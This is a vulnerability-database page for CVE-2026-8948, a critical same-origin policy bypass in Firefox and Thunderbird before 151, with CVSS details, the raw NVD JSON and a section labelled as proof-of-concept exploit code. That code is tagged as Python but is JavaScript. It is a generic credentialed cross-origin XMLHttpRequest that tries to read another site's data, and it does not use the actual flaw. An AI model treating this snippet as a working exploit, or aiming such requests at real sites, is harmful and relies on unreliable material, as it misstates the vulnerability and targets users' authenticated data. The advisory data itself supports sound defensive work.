Security Vulnerability Report
中文
CVE-2026-8948 CVSS 9.1 CRITICAL

CVE-2026-8948

Published: 2026-05-19 14:16:51
Last Modified: 2026-05-19 18:16:33

Description

Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151 and Thunderbird 151.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Firefox < 151
Thunderbird < 151

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept for CVE-2026-8948 // Conceptual exploit demonstrating SOP bypass in DOM: Networking function poc_exploit() { // Target a sensitive endpoint on a different origin const targetUrl = 'https://example.com/private/api/data'; // Attempt to trigger the vulnerable DOM: Networking behavior // This simulates the logic flaw that bypasses SOP checks const vulnerableRequest = new XMLHttpRequest(); vulnerableRequest.open('GET', targetUrl, true); vulnerableRequest.withCredentials = true; // Attempt to send cookies vulnerableRequest.onload = function() { if (vulnerableRequest.status === 200) { // If SOP is bypassed, we can read the responseText console.log('[+] Exploit Successful! Leaked Data:'); console.log(vulnerableRequest.responseText); alert('SOP Bypassed: Data leaked to console.'); } else { console.log('[-] Request failed or blocked.'); } }; try { vulnerableRequest.send(); } catch (e) { console.error('Execution blocked by browser security:', e); } } // Execute the PoC poc_exploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8948", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:51.027", "lastModified": "2026-05-19T18:16:32.957", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151 and Thunderbird 151."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-942"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2038803", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]"}]}}